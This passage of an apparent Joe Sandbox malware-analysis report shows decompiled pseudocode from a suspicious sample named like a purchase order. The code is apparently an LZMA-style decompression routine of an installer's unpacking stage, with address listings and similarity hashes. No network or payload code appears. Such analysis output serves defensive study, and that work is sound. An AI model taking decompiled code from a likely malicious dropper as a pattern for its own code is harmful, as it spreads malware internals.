                      													 *(__ebp - 0x84) = 0x13;
                      													__esi =  *(__ebp - 0x58) + 2;
                      													while(1) {
                      														L132:
                      														 *(_t613 - 0x54) = _t606;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												__eflags = __eax;
                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                      												goto L130;
                      											case 0x13:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													_t469 = __ebp - 0x58;
                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                      													__eflags =  *_t469;
                      													 *(__ebp - 0x30) = 0x10;
                      													 *(__ebp - 0x40) = 8;
                      													L144:
                      													 *(__ebp - 0x7c) = 0x14;
                      													goto L145;
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												 *(__ebp - 0x30) = 8;
                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      												L130:
                      												 *(__ebp - 0x58) = __eax;
                      												 *(__ebp - 0x40) = 3;
                      												goto L144;
                      											case 0x14:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      												__eax =  *(__ebp - 0x80);
                      												 *(_t613 - 0x88) = _t533;
                      												goto L1;
                      											case 0x15:
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xb;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      												goto L120;
                      											case 0x16:
                      												__eax =  *(__ebp - 0x30);
                      												__eflags = __eax - 4;
                      												if(__eax >= 4) {
                      													_push(3);
                      													_pop(__eax);
                      												}
                      												__ecx =  *(__ebp - 4);
                      												 *(__ebp - 0x40) = 6;
                      												__eax = __eax << 7;
                      												 *(__ebp - 0x7c) = 0x19;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L145;
                      											case 0x17:
                      												L145:
                      												__eax =  *(__ebp - 0x40);
                      												 *(__ebp - 0x50) = 1;
                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      												goto L149;
                      											case 0x18:
                      												L146:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x18;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t484 = __ebp - 0x70;
                      												 *_t484 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t484;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L148:
                      												_t487 = __ebp - 0x48;
                      												 *_t487 =  *(__ebp - 0x48) - 1;
                      												__eflags =  *_t487;
                      												L149:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__ecx =  *(__ebp - 0x40);
                      													__ebx =  *(__ebp - 0x50);
                      													0 = 1;
                      													__eax = 1 << __cl;
                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      													__eax =  *(__ebp - 0x7c);
                      													 *(__ebp - 0x44) = __ebx;
                      													while(1) {
                      														 *(_t613 - 0x88) = _t533;
                      														goto L1;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x50);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      												__eax =  *(__ebp - 0x58);
                      												__esi = __edx + __eax;
                      												 *(__ebp - 0x54) = __esi;
                      												__ax =  *__esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													__cx = __ax >> 5;
                      													__eax = __eax - __ecx;
                      													__edx = __edx + 1;
                      													__eflags = __edx;
                      													 *__esi = __ax;
                      													 *(__ebp - 0x50) = __edx;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L148;
                      												} else {
                      													goto L146;
                      												}
                      											case 0x19:
                      												__eflags = __ebx - 4;
                      												if(__ebx < 4) {
                      													 *(__ebp - 0x2c) = __ebx;
                      													L119:
                      													_t393 = __ebp - 0x2c;
                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                      													__eflags =  *_t393;
                      													L120:
                      													__eax =  *(__ebp - 0x2c);
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      														goto L170;
                      													}
                      													__eflags = __eax -  *(__ebp - 0x60);
                      													if(__eax >  *(__ebp - 0x60)) {
                      														goto L171;
                      													}
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      													__eax =  *(__ebp - 0x30);
                      													_t400 = __ebp - 0x60;
                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      													__eflags =  *_t400;
                      													goto L123;
                      												}
                      												__ecx = __ebx;
                      												__eax = __ebx;
                      												__ecx = __ebx >> 1;
                      												__eax = __ebx & 0x00000001;
                      												__ecx = (__ebx >> 1) - 1;
                      												__al = __al | 0x00000002;
                      												__eax = (__ebx & 0x00000001) << __cl;
                      												__eflags = __ebx - 0xe;
                      												 *(__ebp - 0x2c) = __eax;
                      												if(__ebx >= 0xe) {
                      													__ebx = 0;
                      													 *(__ebp - 0x48) = __ecx;
                      													L102:
                      													__eflags =  *(__ebp - 0x48);
                      													if( *(__ebp - 0x48) <= 0) {
                      														__eax = __eax + __ebx;
                      														 *(__ebp - 0x40) = 4;
                      														 *(__ebp - 0x2c) = __eax;
                      														__eax =  *(__ebp - 4);
                      														__eax =  *(__ebp - 4) + 0x644;
                      														__eflags = __eax;
                      														L108:
                      														__ebx = 0;
                      														 *(__ebp - 0x58) = __eax;
                      														 *(__ebp - 0x50) = 1;
                      														 *(__ebp - 0x44) = 0;
                      														 *(__ebp - 0x48) = 0;
                      														L112:
                      														__eax =  *(__ebp - 0x40);
                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      															_t391 = __ebp - 0x2c;
                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      															__eflags =  *_t391;
                      															goto L119;
                      														}
                      														__eax =  *(__ebp - 0x50);
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      														__eax =  *(__ebp - 0x58);
                      														__esi = __edi + __eax;
                      														 *(__ebp - 0x54) = __esi;
                      														__ax =  *__esi;
                      														__ecx = __ax & 0x0000ffff;
                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      														__eflags =  *(__ebp - 0xc) - __edx;
                      														if( *(__ebp - 0xc) >= __edx) {
                      															__ecx = 0;
                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      															__ecx = 1;
                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      															__ebx = 1;
                      															__ecx =  *(__ebp - 0x48);
                      															__ebx = 1 << __cl;
                      															__ecx = 1 << __cl;
                      															__ebx =  *(__ebp - 0x44);
                      															__ebx =  *(__ebp - 0x44) | __ecx;
                      															__cx = __ax;
                      															__cx = __ax >> 5;
                      															__eax = __eax - __ecx;
                      															__edi = __edi + 1;
                      															__eflags = __edi;
                      															 *(__ebp - 0x44) = __ebx;
                      															 *__esi = __ax;
                      															 *(__ebp - 0x50) = __edi;
                      														} else {
                      															 *(__ebp - 0x10) = __edx;
                      															0x800 = 0x800 - __ecx;
                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      															 *__esi = __dx;
                      														}
                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                      														if( *(__ebp - 0x10) >= 0x1000000) {
                      															L111:
                      															_t368 = __ebp - 0x48;
                      															 *_t368 =  *(__ebp - 0x48) + 1;
                      															__eflags =  *_t368;
                      															goto L112;
                      														} else {
                      															goto L109;
                      														}
                      													}
                      													__ecx =  *(__ebp - 0xc);
                      													__ebx = __ebx + __ebx;
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      														__ecx =  *(__ebp - 0x10);
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      														__ebx = __ebx | 0x00000001;
                      														__eflags = __ebx;
                      														 *(__ebp - 0x44) = __ebx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L101:
                      														_t338 = __ebp - 0x48;
                      														 *_t338 =  *(__ebp - 0x48) - 1;
                      														__eflags =  *_t338;
                      														goto L102;
                      													} else {
                      														goto L99;
                      													}
                      												}
                      												__edx =  *(__ebp - 4);
                      												__eax = __eax - __ebx;
                      												 *(__ebp - 0x40) = __ecx;
                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      												goto L108;
                      											case 0x1a:
                      												L56:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1a;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x68);
                      												__al =  *(__ebp - 0x5c);
                      												__edx =  *(__ebp - 8);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *( *(__ebp - 0x68)) = __al;
                      												__ecx =  *(__ebp - 0x14);
                      												 *(__ecx +  *(__ebp - 8)) = __al;
                      												__eax = __ecx + 1;
                      												__edx = 0;
                      												_t192 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t192;
                      												goto L80;
                      											case 0x1b:
                      												L76:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1b;
                      													goto L170;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t275 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t275;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												_t284 = __ebp - 0x64;
                      												 *_t284 =  *(__ebp - 0x64) - 1;
                      												__eflags =  *_t284;
                      												 *( *(__ebp - 0x68)) = __cl;
                      												L80:
                      												 *(__ebp - 0x14) = __edx;
                      												goto L81;
                      											case 0x1c:
                      												while(1) {
                      													L123:
                      													__eflags =  *(__ebp - 0x64);
                      													if( *(__ebp - 0x64) == 0) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__edx =  *(__ebp - 8);
                      													__cl =  *(__eax + __edx);
                      													__eax =  *(__ebp - 0x14);
                      													 *(__ebp - 0x5c) = __cl;
                      													 *(__eax + __edx) = __cl;
                      													__eax = __eax + 1;
                      													__edx = 0;
                      													_t414 = __eax %  *(__ebp - 0x74);
                      													__eax = __eax /  *(__ebp - 0x74);
                      													__edx = _t414;
                      													__eax =  *(__ebp - 0x68);
                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      													__eflags =  *(__ebp - 0x30);
                      													 *( *(__ebp - 0x68)) = __cl;
                      													 *(__ebp - 0x14) = _t414;
                      													if( *(__ebp - 0x30) > 0) {
                      														continue;
                      													} else {
                      														L81:
                      														 *(__ebp - 0x88) = 2;
                      														goto L1;
                      													}
                      												}
                      												 *(__ebp - 0x88) = 0x1c;
                      												goto L170;
                      										}
                      									}
                      									L171:
                      									_t535 = _t534 | 0xffffffff;
                      									goto L172;
                      								}
                      							}
                      						}
                      					}
                      					goto L1;
                      				}
                      			}













                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x0040640d

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                      • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                      • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406355() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xa;
                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                      					} else {
                      						 *(__ebp - 0x84) = 9;
                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      					}
                      					while(1) {
                      						 *(_t613 - 0x54) = _t606;
                      						while(1) {
                      							L133:
                      							_t531 =  *_t606;
                      							_t589 = _t531 & 0x0000ffff;
                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      							if( *(_t613 - 0xc) >= _t565) {
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      								 *(_t613 - 0x40) = 1;
                      								_t532 = _t531 - (_t531 >> 5);
                      								 *_t606 = _t532;
                      							} else {
                      								 *(_t613 - 0x10) = _t565;
                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      							}
                      							if( *(_t613 - 0x10) >= 0x1000000) {
                      								goto L139;
                      							}
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								L170:
                      								_t568 = 0x22;
                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      								_t535 = 0;
                      								L172:
                      								return _t535;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L139:
                      							_t533 =  *(_t613 - 0x84);
                      							while(1) {
                      								 *(_t613 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t613 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      										case 0:
                      											if( *(_t613 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t534 =  *( *(_t613 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t570);
                      											_push(9);
                      											_pop(_t571);
                      											_t609 = _t538 / _t570;
                      											_t540 = _t538 % _t570 & 0x000000ff;
                      											asm("cdq");
                      											_t604 = _t540 % _t571 & 0x000000ff;
                      											 *(_t613 - 0x3c) = _t604;
                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      												L10:
                      												if(_t612 == 0) {
                      													L12:
                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t612 = _t612 - 1;
                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      												} while (_t612 != 0);
                      												goto L12;
                      											}
                      											if( *(_t613 - 4) != 0) {
